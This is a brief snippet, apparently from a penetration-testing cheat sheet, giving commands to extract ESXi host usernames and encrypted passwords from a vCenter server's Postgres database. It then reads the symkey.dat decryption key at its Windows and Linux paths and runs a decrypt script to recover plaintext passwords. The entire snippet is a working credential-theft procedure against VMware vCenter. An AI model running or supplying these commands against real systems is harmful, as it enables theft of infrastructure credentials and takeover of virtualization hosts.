psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc

# the decryption key
# Windows: C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat
# Linux:   /etc/vmware-vpx/ssl/symkey.dat
cat /etc/vmware-vpx/ssl/symkey.dat

# decrypt
python decrypt.py symkey.dat password.enc pass.txt
```

{% endcode %}
